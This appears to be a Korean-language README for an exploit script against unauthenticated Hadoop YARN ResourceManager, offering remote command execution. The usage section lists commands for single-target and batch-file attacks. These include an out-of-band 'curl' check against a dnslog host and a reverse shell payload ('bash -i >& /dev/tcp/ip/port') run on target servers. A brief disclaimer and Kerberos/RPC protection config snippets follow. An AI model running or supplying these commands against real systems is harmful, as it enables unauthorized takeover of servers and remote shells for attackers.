
Hadoop Yan ResourceManager unauthorized RCE
Hadoop yarn ResourceManager에 인가되지 않은 접근 취약점이 있었습니다. 이 취약점은 Hadoop의 핵심 구성 요소인 Hadoop yarn에 존재했습니다. Hadoop yarn은 기본적으로 RPC 서비스를 공개적으로 개방했기 때문에, 원격 공격자가 이 인가되지 않은 취약점을 악용하여 RPC 서비스를 통해 임의의 명령을 실행하고 대상 서버를 제어할 수 있었습니다. 이 취약점은 위험도가 높고 피해가 크며, 상세 정보가 이미 공개되어 공격자에 의해 악용되었으므로, Apache Hadoop을 사용하는 모든 사용자는 자체 점검을 수행하고 제때 보안 조치를 취할 것을 권장합니다.
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
엄숙히 선언합니다: 이 도구를 불법적인 목적으로 사용하지 마십시오. 이 도구는 A측 및 B측 담당자의 안전 자체 점검에만 사용됩니다. 사용자가 불법적으로 사용할 경우, 법적 책임은 사용자가 부담해야 합니다!!!